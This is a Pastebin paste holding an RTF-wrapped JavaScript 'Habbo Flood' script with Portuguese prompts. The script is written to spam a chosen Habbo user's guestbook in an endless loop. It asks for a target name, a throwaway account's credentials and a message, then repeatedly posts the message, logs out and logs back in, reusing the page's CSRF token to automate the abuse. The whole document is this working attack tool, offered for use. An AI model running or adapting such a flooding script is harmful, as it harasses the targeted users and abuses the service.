Guest User

Untitled

a guest
Apr 12th, 2018
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.85 KB | None | 0 0
  1. {\rtf1\ansi\ansicpg1252\deff0\deflang1046{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
  2. {\*\generator Msftedit 5.41.15.1515;}\viewkind4\uc1\pard\f0\fs20 /* Habbo Flood Criado por H4CK3R.C4SH*/ function dospammer() \{ e.open("GET", "/home/" + habbo, true); e.send(); e.onreadystatechange = function () \{ if (e.readyState == 4 && e.status == 200) \{ d.getElementsByTagName("html")[0].innerHTML = e.responseText; wid = d.getElementsByClassName("movable widget GuestbookWidget")[0].id; wid = wid.toString().replace("widget-", ""); app = $$("meta[name=csrf-token]")[0].readAttribute("content"); new Ajax.Request("/myhabbo/guestbook/add", \{ parameters: "ownerId=123&message=" + msg + "&scope=0&query=&widgetId=" + wid, onComplete: function () \{ new Ajax.Request("/account/logout_ok", \{ parameters: "token=" + app, onComplete: function () \{ new Ajax.Request("/account/submit", \{ onComplete: function () \{ new Ajax.Request("/identity/useOrCreateAvatar/" + habboid, \{ parameters: "disableFriendLinking=true", onComplete: function () \{ dospammer() \} \}) \}, parameters: "credentials.username=" + email + "&credentials.password=" + senha \}) \} \}) \} \}) \} \} \} function checkc() \{ habbo = prompt("Digite o Habbo Que vai recebe os recado!:", ""); email = prompt("Digite o email de um fake seu!:", ""); senha = prompt("Digite a senha de seu fake:", ""); msg = prompt("Digite a mensagem que vai pra home do habbo escolido:", ""); habboid = prompt("Apenas confirme essa mensagem!", habboId) \} Overlay.show(); e = new XMLHttpRequest; checkc(); if (habbo == null || habbo == "" || email == null || email == "" || senha == null || senha == "" || msg == null || msg == "" || isNaN(habboid) || habboid.length < 6) \{ alert("Voc\'ea preencheu campo(s) inv\'e1lido(s)"); if (confirm("Quer tentar novamente?")) \{ checkc(); \} else \{ location.reload(); throw "lol" \} \} d = document; dospammer()\par
  3. }
Add Comment
Please, Sign In to add comment